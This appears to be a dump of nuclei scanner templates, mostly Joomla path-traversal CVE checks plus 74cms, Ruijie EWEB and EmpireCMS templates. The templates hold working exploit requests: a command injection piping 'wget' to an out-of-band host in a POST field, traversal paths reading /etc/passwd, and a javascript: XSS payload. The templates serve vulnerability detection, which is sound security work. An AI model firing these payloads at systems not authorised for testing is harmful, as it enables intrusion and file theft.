├── 74cms-workflow.yaml ├── CNVD-2019-19299.yaml ├── CNVD-2019-32204.yaml ├── CNVD-2021-01931.yaml ├── CNVD-2021-09650.yaml ├── CNVD-2021-14536.yaml ├── CNVD-2021-15824.yaml ├── CNVD-2021-26422.yaml ├── CNVD-2021-28277.yaml ├── CNVD-2022-03672.yaml ├── CVE-2007-4504.yaml ├── CVE-2008-4668.yaml ├── CVE-2008-4764.yaml ├── CVE-2008-6080.yaml ├── CVE-2008-6172.yaml ├── CVE-2008-6222.yaml ├── CVE-2009-1496.yaml ├── CVE-2009-1558.yaml ├── CVE-2009-2015.yaml ├── CVE-2009-2100.yaml ├── CVE-2009-3053.yaml ├── CVE-2009-3318.yaml ├── CVE-2009-4202.yaml ├── CVE-2009-4679.yaml ├── CVE-2009-5114.yaml ├── CVE-2010-0157.yaml ├── CVE-2010-0467.yaml ├── CVE-2010-0696.yaml ├── CVE-2010-0759.yaml ├── CVE-2010-0942.yaml ├── CVE-2010-0943.yaml ├── CVE-2010-0944.yaml ├── CVE-2010-0972.yaml ├── CVE-2010-0982.yaml ├── CVE-2010-0985.yaml ├── CVE-2010-1056.yaml ├── CVE-2010-1081.yaml ├── CVE-2010-1217.yaml ├── CVE-2010-1219.yaml ├── CVE-2010-1302.yaml ├── CVE-2010-1304.yaml ├── CVE-2010-1305.yaml ├── CVE-2010-1306.yaml ├── CVE-2010-1307.yaml ├── CVE-2010-1308.yaml ├── CVE-2010-1312.yaml ├── CVE-2010-1313.yaml ├── CVE-2010-1314.yaml ├── CVE-2010-1315.yaml ├── CVE-2010-1340.yaml ├── CVE-2010-1345.yaml ├── CVE-2010-1352.yaml ├── CVE-2010-1353.yaml ├── CVE-2010-1354.yaml ├── CVE-2010-1461.yaml ├── CVE-2010-1469.yaml ├── CVE-2010-1470.yaml ├── CVE-2010-1471.yaml ├── CVE-2010-1472.yaml ├── CVE-2010-1473.yaml ├── CVE-2010-1474.yaml ├── CVE-2010-1475.yaml ├── CVE-2010-1476.yaml ├── CVE-2010-1478.yaml ├── CVE-2010-1491.yaml ├── CVE-2010-1494.yaml ├── CVE-2010-1495.yaml ├── CVE-2010-1531.yaml ├── CVE-2010-1532.yaml ├── CVE-2010-1533.yaml ├── CVE-2010-1534.yaml ├── CVE-2010-1535.yaml ├── CVE-2010-1540.yaml ├── CVE-2010-1601.yaml ├── CVE-2010-1602.yaml ├── CVE-2010-1603.yaml ├── CVE-2010-1607.yaml ├── CVE-2010-1653.yaml ├── CVE-2010-1657.yaml ├── CVE-2010-1658.yaml ├── CVE-2010-1659.yaml ├── CVE-2010-1714.yaml ├── CVE-2010-1715.yaml ├── CVE-2010-1717.yaml ├── CVE-2010-1718.yaml ├── CVE-2010-1719.yaml 
├── CVE-2010-1722.yaml ├── CVE-2010-1723.yaml ├── CVE-2010-1858.yaml ├── CVE-2010-1873.yaml ├── CVE-2010-1875.yaml ├── CVE-2010-1878.yaml ├── CVE-2010-1952.yaml ├── CVE-2010-1953.yaml ├── CVE-2010-1954.yaml ├── CVE-2010-1955.yaml ├── CVE-2010-1956.yaml ├── CVE-2010-1957.yaml ├── CVE-2010-1977.yaml ├── CVE-2010-1979.yaml ├── CVE-2010-1980.yaml ├── CVE-2010-1981.yaml ├── CVE-2010-1982.yaml ├── CVE-2010-1983.yaml ├── CVE-2010-2033.yaml ├── CVE-2010-2034.yaml ├── CVE-2010-2035.yaml ├── CVE-2010-2036.yaml ├── CVE-2010-2037.yaml ├── CVE-2010-2045.yaml ├── CVE-2010-2050.yaml ├── CVE-2010-2122.yaml ├── CVE-2010-2128.yaml ├── CVE-2010-2259.yaml ├── CVE-2010-2307.yaml ├── CVE-2010-2507.yaml ├── CVE-2010-2680.yaml ├── CVE-2010-2682.yaml ├── CVE-2010-2857.yaml ├── CVE-2010-2918.yaml ├── CVE-2010-2920.yaml ├── CVE-2010-3203.yaml ├── CVE-2010-3426.yaml ├── CVE-2010-4231.yaml ├── CVE-2010-4282.yaml ├── CVE-2010-4617.yaml ├── CVE-2010-4719.yaml ├── CVE-2010-4769.yaml ├── CVE-2010-4977.yaml ├── CVE-2010-5028.yaml ├── CVE-2010-5278.yaml ├── CVE-2010-5286.yaml ├── CVE-2011-1669.yaml ├── CVE-2011-2744.yaml ├── CVE-2011-2780.yaml ├── CVE-2011-3315.yaml ├── CVE-2011-4618.yaml ├── CVE-2011-4624.yaml ├── CVE-2011-4804.yaml ├── CVE-2011-4926.yaml ├── CVE-2011-5106.yaml ├── CVE-2011-5107.yaml ├── CVE-2011-5179.yaml ├── CVE-2011-5181.yaml ├── CVE-2011-5265.yaml ├── CVE-2012-0896.yaml ├── CVE-2012-0901.yaml ├── CVE-2012-0981.yaml ├── CVE-2012-0991.yaml ├── CVE-2012-0996.yaml ├── CVE-2012-1226.yaml ├── CVE-2012-1835.yaml ├── CVE-2012-2371.yaml ├── CVE-2012-4242.yaml ├── CVE-2012-4253.yaml ├── CVE-2012-4273.yaml ├── CVE-2012-4768.yaml ├── CVE-2012-4878.yaml ├── CVE-2012-4889.yaml ├── CVE-2012-5913.yaml ├── CVE-2013-2287.yaml ├── CVE-2013-3526.yaml ├── CVE-2013-4117.yaml ├── CVE-2013-4625.yaml ├── CVE-2013-5528.yaml ├── CVE-2013-5979.yaml ├── CVE-2013-7240.yaml ├── CVE-2014-10037.yaml ├── CVE-2014-2908.yaml ├── CVE-2014-2962.yaml ├── CVE-2014-4513.yaml ├── CVE-2014-4535.yaml ├── 
CVE-2014-4536.yaml ├── CVE-2014-4539.yaml ├── CVE-2014-4544.yaml ├── CVE-2014-4550.yaml ├── CVE-2014-4558.yaml ├── CVE-2014-4561.yaml ├── CVE-2014-4592.yaml ├── CVE-2014-4940.yaml ├── CVE-2014-5111.yaml ├── CVE-2014-5258.yaml ├── CVE-2014-5368.yaml ├── CVE-2014-6308.yaml ├── CVE-2014-8682.yaml ├── CVE-2014-8799.yaml ├── CVE-2014-9094.yaml ├── CVE-2014-9444.yaml ├── CVE-2014-9606.yaml ├── CVE-2014-9607.yaml ├── CVE-2014-9608.yaml ├── CVE-2014-9609.yaml ├── CVE-2014-9614.yaml ├── CVE-2014-9615.yaml ├── CVE-2014-9617.yaml ├── CVE-2014-9618.yaml ├── CVE-2015-0554.yaml ├── CVE-2015-1000012.yaml ├── CVE-2015-2067.yaml ├── CVE-2015-2068.yaml ├── CVE-2015-2166.yaml ├── CVE-2015-2807.yaml ├── CVE-2015-4414.yaml ├── CVE-2015-4632.yaml ├── CVE-2015-6920.yaml ├── CVE-2015-7377.yaml ├── CVE-2015-7780.yaml ├── CVE-2015-9414.yaml ├── CVE-2015-9480.yaml ├── CVE-2016-1000126.yaml ├── CVE-2016-1000127.yaml ├── CVE-2016-1000128.yaml ├── CVE-2016-1000129.yaml ├── CVE-2016-1000130.yaml ├── CVE-2016-1000131.yaml ├── CVE-2016-1000132.yaml ├── CVE-2016-1000133.yaml ├── CVE-2016-1000134.yaml ├── CVE-2016-1000135.yaml ├── CVE-2016-1000136.yaml ├── CVE-2016-1000137.yaml ├── CVE-2016-1000138.yaml ├── CVE-2016-1000139.yaml ├── CVE-2016-1000140.yaml ├── CVE-2016-1000141.yaml ├── CVE-2016-1000142.yaml ├── CVE-2016-1000143.yaml ├── CVE-2016-1000146.yaml ├── CVE-2016-1000148.yaml ├── CVE-2016-1000149.yaml ├── CVE-2016-1000152.yaml ├── CVE-2016-1000153.yaml ├── CVE-2016-1000154.yaml ├── CVE-2016-1000155.yaml ├── CVE-2016-10940.yaml ├── CVE-2016-10956.yaml ├── CVE-2016-10960.yaml ├── CVE-2016-10993.yaml ├── CVE-2016-2389.yaml ├── CVE-2017-1000028.yaml ├── CVE-2017-15647.yaml ├── CVE-2017-17043.yaml ├── CVE-2017-17059.yaml ├── CVE-2017-17451.yaml ├── CVE-2017-18536.yaml ├── CVE-2017-5487.yaml ├── CVE-2017-9288.yaml ├── CVE-2018-1000129.yaml ├── CVE-2018-10822.yaml ├── CVE-2018-11709.yaml ├── CVE-2018-12031.yaml ├── CVE-2018-15473.yaml ├── CVE-2018-15535.yaml ├── CVE-2018-16059.yaml ├── 
CVE-2018-16288.yaml ├── CVE-2018-17422.yaml ├── CVE-2018-19458.yaml ├── CVE-2018-20462.yaml ├── CVE-2018-20470.yaml ├── CVE-2018-20985.yaml ├── CVE-2018-5316.yaml ├── CVE-2018-6008.yaml ├── CVE-2018-6200.yaml ├── CVE-2018-9205.yaml ├── CVE-2019-12276.yaml ├── CVE-2019-13396.yaml ├── CVE-2019-14312.yaml ├── CVE-2019-14470.yaml ├── CVE-2019-15713.yaml ├── CVE-2019-15889.yaml ├── CVE-2019-16332.yaml ├── CVE-2019-16525.yaml ├── CVE-2019-19134.yaml ├── CVE-2019-20085.yaml ├── CVE-2019-9618.yaml ├── CVE-2020-11455.yaml ├── CVE-2020-12054.yaml ├── CVE-2020-17362.yaml ├── CVE-2020-29227.yaml ├── CVE-2020-29395.yaml ├── CVE-2020-35580.yaml ├── CVE-2020-35598.yaml ├── CVE-2021-23241.yaml ├── CVE-2021-24235.yaml ├── CVE-2021-24298.yaml ├── CVE-2021-24320.yaml ├── CVE-2021-24335.yaml ├── CVE-2021-24389.yaml ├── CVE-2021-24499.yaml ├── CVE-2021-27330.yaml ├── CVE-2021-29625.yaml ├── CVE-2021-30049.yaml ├── CVE-2021-33807.yaml ├── CVE-2021-38647.yaml ├── CVE-2021-39316.yaml ├── CVE-2021-40539.yaml ├── CVE-2021-40868.yaml ├── CVE-2021-40960.yaml ├── CVE-2021-41648.yaml ├── CVE-2021-41649.yaml ├── CVE-2021-41773.yaml ├── CVE-2021-44228.yaml ├── CVE-2022-23808.yaml ├── README.md ├── acrolinx-workflow.yaml ├── activemq-workflow.yaml ├── admin-word-count-column-lfi.yaml ├── adminer-workflow.yaml ├── ambari-workflow.yaml ├── amministrazione-aperta-lfi.yaml ├── apereo-cas-workflow.yaml ├── api-1forge.yaml ├── api-abstractapi.yaml ├── api-abuseipdb.yaml ├── api-adoptapet.yaml ├── api-alchemy.yaml ├── api-alienvault.yaml ├── api-amdoren.yaml ├── api-aniapi.yaml ├── api-bhagavadgita.yaml ├── api-bible.yaml ├── api-binance.yaml ├── api-bitcoinaverage.yaml ├── api-bitquery.yaml ├── api-bitrise.yaml ├── api-block.yaml ├── api-blockchain.yaml ├── api-blockfrost.yaml ├── api-box.yaml ├── api-bravenewcoin.yaml ├── api-calendarific.yaml ├── api-charity.yaml ├── api-clearbit.yaml ├── api-coinapi.yaml ├── api-coinlayer.yaml ├── api-coinmarketcap.yaml ├── api-coinranking.yaml ├── 
api-cooperhewitt.yaml ├── api-covalent.yaml ├── api-ddownload.yaml ├── api-dribbble.yaml ├── api-ebird.yaml ├── api-etherscan.yaml ├── api-europeana.yaml ├── api-festivo.yaml ├── api-gofile.yaml ├── api-harvardart.yaml ├── api-hirak-rates.yaml ├── api-holidayapi.yaml ├── api-iconfinder.yaml ├── api-improvmx.yaml ├── api-instatus.yaml ├── api-iucn.yaml ├── api-mailboxvalidator.yaml ├── api-malshare.yaml ├── api-malwarebazaar.yaml ├── api-micro-user-service.yaml ├── api-mojoauth.yaml ├── api-myanimelist.yaml ├── api-mywot.yaml ├── api-nownodes.yaml ├── api-orbintelligence.yaml ├── api-pastebin.yaml ├── api-petfinder.yaml ├── api-pinata.yaml ├── api-quip.yaml ├── api-rijksmuseum.yaml ├── api-scanii.yaml ├── api-smartsheet.yaml ├── api-stytch.yaml ├── api-thecatapi.yaml ├── api-thedogapi.yaml ├── api-trello.yaml ├── api-urlscan.yaml ├── api-virustotal.yaml ├── api-web3storage.yaml ├── api-wordcloud.yaml ├── apisix-workflow.yaml ├── argocd-login.yaml ├── artifactory-workflow.yaml ├── avantfax-panel.yaml ├── avantfax-workflow.yaml ├── aviatrix-panel.yaml ├── aviatrix-workflow.yaml ├── axigen-workflow.yaml ├── b2evolution-workflow.yaml ├── bedita-panel.yaml ├── bitrix-workflow.yaml ├── bolt-cms-panel.yaml ├── bookstack-panel.yaml ├── bullwark-workflow.yaml ├── cacti-panel.yaml ├── centos-workflow.yaml ├── centreon-panel.yaml ├── chamilo-workflow.yaml ├── checkpoint-workflow.yaml ├── cherokee-workflow.yaml ├── circarlife-workflow.yaml ├── cisco-meraki-workflow.yaml ├── cocoon-workflow.yaml ├── coldfusion-workflow.yaml ├── dahua-workflow.yaml ├── daybyday-panel.yaml ├── dedecms-workflow.yaml ├── dolibarr-panel.yaml ├── dolibarr-workflow.yaml ├── dotclear-panel.yaml ├── dotnetnuke-workflow.yaml ├── druid-panel.yaml ├── drupal-workflow.yaml ├── duomicms-workflow.yaml ├── emby-workflow.yaml ├── ems-webclient-panel.yaml ├── episerver-workflow.yaml ├── error-logs.yaml ├── exposed-bitkeeper.yaml ├── exposed-bzr.yaml ├── exposed-darcs.yaml ├── exposed-hg.yaml ├── 
feifeicms-workflow.yaml ├── finereport-workflow.yaml ├── fortinet-panel.yaml ├── fortinet-workflow.yaml ├── gateone-workflow.yaml ├── geowebserver-workflow.yaml ├── gespage-panel.yaml ├── gespage-workflow.yaml ├── gitlist-workflow.yaml ├── glpi-panel.yaml ├── glpi-workflow.yaml ├── gogs-workflow.yaml ├── google-books.yaml ├── graphite-workflow.yaml ├── grav-workflow.yaml ├── gsoap-workflow.yaml ├── guacamole-workflow.yaml ├── h3c-imc-workflow.yaml ├── home-assistant-detect.yaml ├── igs-workflow.yaml ├── itop-workflow.yaml ├── jaspersoft-panel.yaml ├── jboss-detect.yaml ├── jboss-workflow.yaml ├── jeedom-panel.yaml ├── jeedom-workflow.yaml ├── jenkins-detect.yaml ├── jetty-workflow.yaml ├── joomla-jvehicles-lfi.yaml ├── joomla-workflow.yaml ├── kentico-workflow.yaml ├── keycloak-workflow.yaml ├── kibana-panel.yaml ├── kibana-workflow.yaml ├── kindeditor-workflow.yaml ├── kong-workflow.yaml ├── lanproxy-workflow.yaml ├── lansweeper-workflow.yaml ├── laravel-workflow.yaml ├── magmi-workflow.yaml ├── maian-workflow.yaml ├── manageengine-opmanager.yaml ├── mantisbt-workflow.yaml ├── mautic-crm-panel.yaml ├── mautic-workflow.yaml ├── metabase-panel.yaml ├── metabase-workflow.yaml ├── metinfo-workflow.yaml ├── microsoft-exchange-workflow.yaml ├── microstrategy-workflow.yaml ├── mobileiron-workflow.yaml ├── moodle-workflow.yaml ├── netsweeper-open-redirect.yaml ├── netsweeper-rxss.yaml ├── netsweeper-workflow.yaml ├── nette-workflow.yaml ├── nginx-version.yaml ├── ninjaform-open-redirect.yaml ├── node-red-workflow.yaml ├── novnc-workflow.yaml ├── ofbiz-workflow.yaml ├── oneblog-detect.yaml ├── openam-workflow.yaml ├── opencast-detect.yaml ├── openemr-workflow.yaml ├── opensis-workflow.yaml ├── opensns-workflow.yaml ├── oscommerce-workflow.yaml ├── pandora-workflow.yaml ├── pega-workflow.yaml ├── pentaho-workflow.yaml ├── phpcollab-workflow.yaml ├── phpinfo.yaml ├── phppgadmin-workflow.yaml ├── phpwiki-workflow.yaml ├── powercreator-workflow.yaml ├── 
processmaker-workflow.yaml ├── prometheus-workflow.yaml ├── prtg-workflow.yaml ├── pulsesecure-workflow.yaml ├── qcubed-workflow.yaml ├── r-seenet-workflow.yaml ├── rancher-workflow.yaml ├── rconfig-workflow.yaml ├── remkon-manager-panel.yaml ├── ricoh-workflow.yaml ├── rosariosis-workflow.yaml ├── rstudio-workflow.yaml ├── sage-panel.yaml ├── saltstack-workflow.yaml ├── sarg-workflow.yaml ├── sco-workflow.yaml ├── seeddms-panel.yaml ├── sequoiadb-workflow.yaml ├── sharepoint-workflow.yaml ├── shopxo-workflow.yaml ├── sidekiq-workflow.yaml ├── skywalking-workflow.yaml ├── solr-workflow.yaml ├── sonarqube-workflow.yaml ├── sourcebans-workflow.yaml ├── splunk-workflow.yaml ├── square-access-token.yaml ├── squirrelmail-workflow.yaml ├── strapi-cms-detect.yaml ├── subrion-workflow.yaml ├── sugarcrm-workflow.yaml ├── symfony-workflow.yaml ├── tapestry-workflow.yaml ├── terramaster-workflow.yaml ├── thinfinity-workflow.yaml ├── thinkadmin-workflow.yaml ├── thinkcmf-detect.yaml ├── thruk-workflow.yaml ├── tikiwiki-workflow.yaml ├── tongda-workflow.yaml ├── tpshop-workflow.yaml ├── traefik-workflow.yaml ├── twitter-secret.yaml ├── umbraco-workflow.yaml ├── vmware-workflow.yaml ├── voipmonitor-workflow.yaml ├── wazuh-panel.yaml ├── webmin-workflow.yaml ├── webmodule-ee-panel.yaml ├── websvn-workflow.yaml ├── wordpress-accessible-wpconfig.yaml ├── wp-ambience-xss.yaml ├── wp-church-admin-xss.yaml ├── wp-custom-tables-xss.yaml ├── wp-finder-xss.yaml ├── wp-flagem-xss.yaml ├── wp-knews-xss.yaml ├── wp-nextgen-xss.yaml ├── wp-phpfreechat-xss.yaml ├── wp-securimage-xss.yaml ├── wp-slideshow-xss.yaml ├── wp-socialfit-xss.yaml ├── wuzhicms-workflow.yaml ├── xdcms-workflow.yaml ├── xiuno-workflow.yaml ├── xxljob-panel.yaml ├── xxljob-workflow.yaml ├── yapi-workflow.yaml ├── yii-workflow.yaml ├── yzmcms-panel.yaml ├── zabbix-workflow.yaml ├── zcms-workflow.yaml ├── zeroshell-workflow.yaml ├── zimbra-workflow.yaml └── zzzcms-workflow.yaml /74cms-workflow.yaml: 
-------------------------------------------------------------------------------- 1 | id: 74cms-workflow 2 | 3 | info: 4 | name: 74cms Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all 74cms related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/fingerprinthub-web-fingerprints.yaml 10 | matchers: 11 | - name: 74cms 12 | subtemplates: 13 | - tags: 74cms -------------------------------------------------------------------------------- /CNVD-2021-09650.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2021-09650 2 | 3 | info: 4 | name: Ruijie EWEB Gateway Platform - Remote Command Injection 5 | author: daffainfo 6 | severity: critical 7 | description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks. 8 | reference: 9 | - http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/ 10 | classification: 11 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 12 | cvss-score: 10.0 13 | cwe-id: CWE-77 14 | tags: ruijie,cnvd,cnvd2021,rce 15 | 16 | requests: 17 | - raw: 18 | - | 19 | POST /guest_auth/guestIsUp.php 20 | Host: {{Hostname}} 21 | 22 | mac=1&ip=127.0.0.1|wget {{interactsh-url}} 23 | 24 | unsafe: true 25 | matchers: 26 | - type: word 27 | part: interactsh_protocol 28 | name: http 29 | words: 30 | - "http" 31 | 32 | # Enhanced by mp on 2022/05/12 33 | -------------------------------------------------------------------------------- /CNVD-2021-15824.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2021-15824 2 | 3 | info: 4 | name: EmpireCMS DOM Cross Site-Scripting 5 | author: daffainfo 6 | severity: high 7 | description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack. 
8 | reference: 9 | - https://sourceforge.net/projects/empirecms/ 10 | - https://www.bilibili.com/read/cv10441910 11 | - https://vul.wangan.com/a/CNVD-2021-15824 12 | classification: 13 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N 14 | cvss-score: 7.2 15 | cwe-id: CWE-79 16 | tags: empirecms,cnvd,cnvd2021,xss,domxss 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)" 22 | 23 | matchers-condition: and 24 | matchers: 25 | - type: word 26 | part: body 27 | words: 28 | - 'if(Request("url")!=0)' 29 | - 'href=\""+Request("url")+"\"' 30 | condition: and 31 | 32 | - type: status 33 | status: 34 | - 200 35 | 36 | # Enhanced by mp on 2022/03/23 37 | -------------------------------------------------------------------------------- /CVE-2007-4504.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2007-4504 2 | 3 | info: 4 | name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval 5 | author: daffainfo 6 | severity: high 7 | description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/4307 10 | - https://www.cvedetails.com/cve/CVE-2007-4504 11 | - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 12 | classification: 13 | cve-id: CVE-2007-4504 14 | tags: cve,cve2007,joomla,lfi 15 | 16 | requests: 17 | - method: GET 18 | path: 19 | - "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd" 20 | 21 | matchers-condition: and 22 | matchers: 23 | 24 | - type: regex 25 | regex: 26 | - "root:.*:0:0:" 27 | 28 | - type: status 29 | status: 30 | - 200 31 | -------------------------------------------------------------------------------- /CVE-2008-4668.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2008-4668 2 | 3 | info: 4 | name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/6618 10 | - https://www.cvedetails.com/cve/CVE-2008-4668 11 | - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/ 12 | - http://securityreason.com/securityalert/4464 13 | classification: 14 | cve-id: CVE-2008-4668 15 | tags: cve,cve2008,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2008-6080.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2008-6080 2 | 3 | info: 4 | name: Joomla! Component ionFiles 4.4.2 - File Disclosure 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/6809 10 | - https://www.cvedetails.com/cve/CVE-2008-6080 11 | - http://secunia.com/advisories/32377 12 | - http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/ 13 | classification: 14 | cve-id: CVE-2008-6080 15 | tags: cve,cve2008,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2008-6222.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2008-6222 2 | 3 | info: 4 | name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/6980 10 | - https://www.cvedetails.com/cve/CVE-2008-6222 11 | - http://secunia.com/advisories/32523 12 | - http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/ 13 | classification: 14 | cve-id: CVE-2008-6222 15 | tags: cve,cve2008,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2009-1496.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-1496 2 | 3 | info: 4 | name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/8367 10 | - https://www.cvedetails.com/cve/CVE-2009-1496 11 | - http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/ 12 | - http://www.securityfocus.com/bid/34431 13 | classification: 14 | cve-id: CVE-2009-1496 15 | tags: cve,cve2009,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2009-2015.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-2015 2 | 3 | info: 4 | name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/8898 10 | - https://www.cvedetails.com/cve/CVE-2009-2015 11 | - http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/ 12 | - http://www.vupen.com/english/advisories/2009/1530 13 | classification: 14 | cve-id: CVE-2009-2015 15 | tags: cve,cve2009,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2009-2100.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-2100 2 | 3 | info: 4 | name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/8946 10 | - https://www.cvedetails.com/cve/CVE-2009-2100 11 | - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/ 12 | - http://www.securityfocus.com/bid/35378 13 | classification: 14 | cve-id: CVE-2009-2100 15 | tags: cve,cve2009,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd" 21 | 22 | matchers-condition: and 23 | matchers: 24 | 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | 29 | - type: status 30 | status: 31 | - 200 32 | -------------------------------------------------------------------------------- /CVE-2009-5114.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2009-5114 2 | 3 | info: 4 | name: WebGlimpse 2.18.7 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. 8 | reference: 9 | - https://www.exploit-db.com/exploits/36994 10 | - https://www.cvedetails.com/cve/CVE-2009-5114 11 | - http://websecurity.com.ua/2628/ 12 | - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321 13 | remediation: Apply all relevant security patches and product upgrades. 
14 | classification: 15 | cve-id: CVE-2009-5114 16 | tags: cve,cve2009,lfi 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd" 22 | matchers-condition: and 23 | matchers: 24 | - type: regex 25 | regex: 26 | - "root:.*:0:0:" 27 | - type: status 28 | status: 29 | - 200 30 | # Enhanced by mp on 2022/02/13 31 | -------------------------------------------------------------------------------- /CVE-2010-0972.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2010-0972 2 | 3 | info: 4 | name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. 8 | reference: 9 | - https://www.exploit-db.com/exploits/11738 10 | - https://www.cvedetails.com/cve/CVE-2010-0972 11 | - http://secunia.com/advisories/38925 12 | remediation: Apply all relevant security patches and product upgrades. 13 | classification: 14 | cve-id: CVE-2010-0972 15 | tags: cve,cve2010,joomla,lfi 16 | 17 | requests: 18 | - method: GET 19 | path: 20 | - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00" 21 | matchers-condition: and 22 | matchers: 23 | - type: regex 24 | 